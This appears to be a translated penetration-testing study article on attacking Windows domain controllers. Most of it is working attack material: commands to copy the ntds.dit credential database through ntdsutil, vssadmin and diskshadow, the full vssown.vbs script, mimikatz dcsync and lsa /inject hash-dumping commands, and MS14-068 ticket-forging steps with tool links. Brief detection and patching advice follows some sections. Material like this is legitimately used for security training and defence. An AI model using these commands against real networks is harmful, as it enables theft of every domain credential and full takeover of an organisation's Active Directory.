content
foreword
In this article, continue to read and learn "Intranet Security Attack and Defense: Penetration Testing Practical Guide". This chapter is domain controller security. It introduces the method of using Kerberos domain users to escalate privileges and export the hash value in ntds.dit, and attack against domain controllers. Effective safety recommendations are made
In the actual network environment, the ultimate goal of an attacker infiltrating the intranet is to obtain the authority of the domain controller, thereby controlling the entire domain
1. Use Volume Shadow Copy Service to extract ntds.dit
In Active Directory, all data is stored in the ntds.dit file
- ntds.dit is a binary file, stored in DC's
C:\Windows\NTDS\ntds.dit
- Contains all the information in the domain, you can export computer information and other information in the domain by analyzing ntds.dit
- Like SAM files, they are locked by the system
ntds.dit can be extracted with Volume Shadow Copy Service (VSS) , which is essentially a snapshot technology and is mainly used for backup and recovery (even if the target file is locked)
1 、 ntdsutil.exe
A command-line tool that provides management mechanism for AD, supports Windows server 2003/2008/2012
//创建快照
ntdsutil snapshot "activate instance ntds" create quit quit
//加载快照
ntdsutil snapshot "mount <GUID>" quit quit
//复制快照中的nitds.dit
copy <加载后快照的位置> c:\tmp:ntds.dit
//删除快照
ntdsutil snapshot "unmount <GUID>" "delete <GUID>" quit quit
2 、 vssadmin
VSS management tool provided by Windows 7 and server 2008
//创建C盘的卷影拷贝
vssadmin create shadow /for=c:
//复制ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\window\NTDS\ntds.dit c:\ntds.dit
//删除拷贝
vssadmin delete shadow /for=c: /quiet
3、vssown.vbs
Script developed by Tim Tomes, similar to vssadmin
The script is as follows
REM Volume Shadow Copy Management from CLI.
REM Part of the presentation "Lurking in the Shadows" by Mark Baggett and Tim "LaNMaSteR53" Tomes.
REM Co-developed by Mark Baggett (@MarkBaggett) and Tim Tomes (@lanmaster53).
Set args = WScript.Arguments
if args.Count < 1 Then
wscript.Echo "Usage: cscript vssown.vbs [option]"
wscript.Echo
wscript.Echo " Options:"
wscript.Echo
wscript.Echo " /list - List current volume shadow copies."
wscript.Echo " /start - Start the shadow copy service."
wscript.Echo " /stop - Halt the shadow copy service."
wscript.Echo " /status - Show status of shadow copy service."
wscript.Echo " /mode - Display the shadow copy service start mode."
wscript.Echo " /mode [Manual|Automatic|Disabled] - Change the shadow copy service start mode."
wscript.Echo " /create [drive_letter] - Create a shadow copy."
wscript.Echo " /delete [id|*] - Delete a specified or all shadow copies."
wscript.Echo " /mount [path] [device_object] - Mount a shadow copy to the given path."
wscript.Echo " /execute [\path\to\file] - Launch executable from within an umounted shadow copy."
wscript.Echo " /store - Display storage statistics."
wscript.Echo " /size [bytes] - Set drive space reserved for shadow copies."
REM build_off
wscript.Echo " /build [filename] - Print pasteable script to stdout."REM no_build
REM build_on
wscript.Quit(0)
End If
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Select Case args.Item(0)
Case "/list"
Wscript.Echo "SHADOW COPIES"
Wscript.Echo "============="
Wscript.Echo
Set colItems = objWMIService.ExecQuery("Select * from Win32_ShadowCopy")
For Each objItem in colItems
Wscript.Echo "[*] ID: " & objItem.ID
Wscript.Echo "[*] Client accessible: " & objItem.ClientAccessible
Wscript.Echo "[*] Count: " & objItem.Count
Wscript.Echo "[*] Device object: " & objItem.DeviceObject
Wscript.Echo "[*] Differential: " & objItem.Differential
Wscript.Echo "[*] Exposed locally: " & objItem.ExposedLocally
Wscript.Echo "[*] Exposed name: " & objItem.ExposedName
Wscript.Echo "[*] Exposed remotely: " & objItem.ExposedRemotely
Wscript.Echo "[*] Hardware assisted: " & objItem.HardwareAssisted
Wscript.Echo "[*] Imported: " & objItem.Imported
Wscript.Echo "[*] No auto release: " & objItem.NoAutoRelease
Wscript.Echo "[*] Not surfaced: " & objItem.NotSurfaced
Wscript.Echo "[*] No writers: " & objItem.NoWriters
Wscript.Echo "[*] Originating machine: " & objItem.OriginatingMachine
Wscript.Echo "[*] Persistent: " & objItem.Persistent
Wscript.Echo "[*] Plex: " & objItem.Plex
Wscript.Echo "[*] Provider ID: " & objItem.ProviderID
Wscript.Echo "[*] Service machine: " & objItem.ServiceMachine
Wscript.Echo "[*] Set ID: " & objItem.SetID
Wscript.Echo "[*] State: " & objItem.State
Wscript.Echo "[*] Transportable: " & objItem.Transportable
Wscript.Echo "[*] Volume name: " & objItem.VolumeName
Wscript.Echo
Next
wscript.Quit(0)
Case "/start"
Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
For Each objService in colListOfServices
objService.StartService()
Wscript.Echo "[*] Signal sent to start the " & objService.Name & " service."
Next
wscript.Quit(0)
Case "/stop"
Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
For Each objService in colListOfServices
objService.StopService()
Wscript.Echo "[*] Signal sent to stop the " & objService.Name & " service."
Next
wscript.Quit(0)
Case "/status"
Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
For Each objService in colListOfServices
Wscript.Echo "[*] " & objService.State
Next
wscript.Quit(0)
Case "/mode"
Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
For Each objService in colListOfServices
if args.Count < 2 Then
Wscript.Echo "[*] " & objService.Name & " service set to '" & objService.StartMode & "' start mode."
Else
mode = LCase(args.Item(1))
if mode = "manual" or mode = "automatic" or mode = "disabled" Then
errResult = objService.ChangeStartMode(mode)
Wscript.Echo "[*] " & objService.Name & " service set to '" & mode & "' start mode."
Else
Wscript.Echo "[*] '" & mode & "' is not a valid start mode."
End If
END If
Next
wscript.Quit(errResult)
Case "/create"
VOLUME = args.Item(1) & ":\"
Const CONTEXT = "ClientAccessible"
Set objShadowStorage = objWMIService.Get("Win32_ShadowCopy")
Wscript.Echo "[*] Attempting to create a shadow copy."
errResult = objShadowStorage.Create(VOLUME, CONTEXT, strShadowID)
wscript.Quit(errResult)
Case "/delete"
id = args.Item(1)
Set colItems = objWMIService.ExecQuery("Select * From Win32_ShadowCopy")
For Each objItem in colItems
if objItem.ID = id Then
Wscript.Echo "[*] Attempting to delete shadow copy with ID: " & id
errResult = objItem.Delete_
ElseIf id = "*" Then
Wscript.Echo "[*] Attempting to delete shadow copy " & objItem.DeviceObject & "."
errResult = objItem.Delete_
End If
Next
wscript.Quit(errResult)
Case "/mount"
Set WshShell = WScript.CreateObject("WScript.Shell")
link = args.Item(1)
sc = args.Item(2) & "\"
cmd = "cmd /C mklink /D " & link & " " & sc
WshShell.Run cmd, 2, true
Wscript.Echo "[*] " & sc & " has been mounted to " & link & "."
wscript.Quit(0)
Case "/execute"
file = args.Item(1)
Set colItems = objWMIService.ExecQuery("Select * From Win32_ShadowCopy")
Set objProcess = objWMIService.Get("Win32_Process")
For Each objItem in colItems
path = Replace(objItem.DeviceObject,"?",".") & file
intReturn = objProcess.Create(path)
if intReturn <> 0 Then
wscript.Echo "[*] Process could not be created from " & path & "."
wscript.Echo "[*] ReturnValue = " & intReturn
Else
wscript.Echo "[!] Process created from " & path & "."
wscript.Quit(0)
End If
Next
wscript.Quit(0)
Case "/store"
Wscript.Echo "SHADOW STORAGE"
Wscript.Echo "=============="
Wscript.Echo
Set colItems = objWMIService.ExecQuery("Select * from Win32_ShadowStorage")
For Each objItem in colItems
Wscript.Echo "[*] Allocated space: " & FormatNumber(objItem.AllocatedSpace / 1000000,0) & "MB"
Wscript.Echo "[*] Maximum size: " & FormatNumber(objItem.MaxSpace / 1000000,0) & "MB"
Wscript.Echo "[*] Used space: " & FormatNumber(objItem.UsedSpace / 1000000,0) & "MB"
Wscript.Echo
Next
wscript.Quit(0)
Case "/size"
storagesize = CDbl(args.Item(1))
Set colItems = objWMIService.ExecQuery("Select * from Win32_ShadowStorage")
For Each objItem in colItems
objItem.MaxSpace = storagesize
objItem.Put_
Next
Wscript.Echo "[*] Shadow storage space has been set to " & FormatNumber(storagesize / 1000000,0) & "MB."
wscript.Quit(0)
REM build_off
Case "/build"
build = 1
Const ForReading = 1
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objTextFile = objFSO.OpenTextFile("vssown.vbs", ForReading)
Do Until objTextFile.AtEndOfStream
strNextLine = objTextFile.Readline
if InStr(strNextLine,"REM build_off") = 3 Then
build = 0
End If
if strNextLine <> "" and build = 1 Then
strNextLine = Replace(strNextLine,"&","^&")
strNextLine = Replace(strNextLine,">","^>")
strNextLine = Replace(strNextLine,"<","^<")
wscript.Echo "echo " & strNextLine & " >> " & args.Item(1)
End If
if InStr(strNextLine,"REM build_on") = 3 Then
build = 1
End If
Loop
wscript.Quit(0)
REM build_on
End Select
4. IFM of ntdsutil
When using ntdsutil to create an IFM, you need to generate snapshots, load, copy ntds.dit and the computer's SAM file to the target folder, etc.
ntdsutil "ac i ntds" "ifm" "create full c:/test" q q
Then copy ntds.dit to c:\test\Active Directory
Copy SYSTEM and SECURITY to c:\test\registry\
There is a script Copy-VSS.ps1 in Nishang that implements the whole process
5、diskshadow
diskshadow.exe can use VSS and export ntds.dit
- Officially produced by Microsoft, the code is signed by Microsoft
- Windows server 2008, 2012, 2016 comes with default
C:\Windows\system32
You must operate in when exporting ntds.dit
After exporting ntds.dit, you can use reg to dump system.hive. Because the key of ntds.dit is stored in system.hive, the information in ntds.dit cannot be viewed without the key
In the penetration test, the text file containing the commands to be executed should be written to the remote target system first, and then the file should be executed using diskshadow.exe, which is more flexible. The text is as follows:
//设置卷影拷贝
set context persistent nowriters
//添加卷
add volume c: alias someAlias
//创建快照
create
//分配虚拟磁盘盘符
expose %someAlias% k:
//复制ntds.dit
exec "cmd.exe" /c copy k:\Windows\NTDS\ntds.dit c:\ntds.dit
//列出卷影拷贝
list shadows all
//重置
reset
//退出
exit
6. Prevention
By monitoring the usage of the Volume Shadow Copy service, malicious operations performed by attackers in the system can be discovered in time:
- Monitors the Volume Shadow Copy service and any suspicious behavior involving the Active Directory database file (ntds.dit)
- Monitor for suspicious instances of System Event ID 7036 (a sign that the Volume Shadow Copy service has entered a running state), and events that create the vssvc.exe process
- Monitor events that create diskshadow.exe and related child processes
- Monitor diskshadow.exe instance creation events in client devices (unless business needs, diskshadowexe should not appear in Wmdows OS)
- Monitor emerging logical drive mapping events through logs
2. Export the hash value in ntds.dit
Use of several tools:
- https://github.com/libyal/libesedb
- https://github.com/csababarta/ntdsxtract
- https://github.com/zcgonvh/NTDSDumpEx
3. Use dcsync to get the domain hash value
mimikatz has a dcsync function that can use the Volume Shadow Copy Service VSS to directly read ntds.dit and retrieve the domain hash value, which requires domain administrator privileges
//导出域内所有用户名和散列值
lsadump::dcsync /domain:test.com /all /csv
//导出指定用户Dm散列值
lsadump::dcsync /domain:test.com /User:Dm
//转储lsass.exe进程对散列值进行dump操作
privilege::debug
lsadump::lsa /inject
There are too many execution results of the mimikatz command to be fully displayed. You can execute the log command first (a text file will be generated in the current directory to record all the execution results of mimikatz)
4. Other methods for obtaining the domain hash value
1、Metasploit
use auxiliary/admin/amb/psexec_ntdsgrab
2. vshadow.exe and QuarkPwDump.exe
QuarkPwDump to quickly, safely and comprehensively read all domain accounts and domain hashes
Download address: https://github.com/quarkslab/quarkspwdump
Five, Kerberos domain user privilege escalation vulnerability
Kerberos Domain User Elevation of Privilege Vulnerability (MS14-068, CVE-2014-6324, KB3011780)
- Windows 2012 R2 and previous versions are affected
- If an attacker obtains the shell authority of any computer in the domain, and also knows the username, SID, and password of any domain user, he can obtain the domain administrator authority, and then control the DC, and finally obtain the domain authority.
The general process of ticket injection :
- Check the DC patch installation (systeminfo, WMIC qfe)
- View the user's SID (
whoami /user
) - Generate High Privilege Ticket (ms14-068.exe)
- View permissions before injection (
dir \\\\DC\c$
) - clear all tickets in memory (mimikatz,
kerberos::purge
) - inject high-privilege ticket into memory (
kerberos::ptc
) - Verify permissions
Some tools:
- PyKEK:https://github.com/mubix/pykek
- goldenPac.py in impacket
- ms14_068_kerberos_checksum in metasploit
Repair suggestion:
- Turn on Windows Update
- manual patch
- Control accounts within the domain
- Disable weak passwords
- Change your password regularly and in a timely manner
- Install anti-virus software and update virus database in time
Epilogue
Mainly around the acquisition of ntds.dit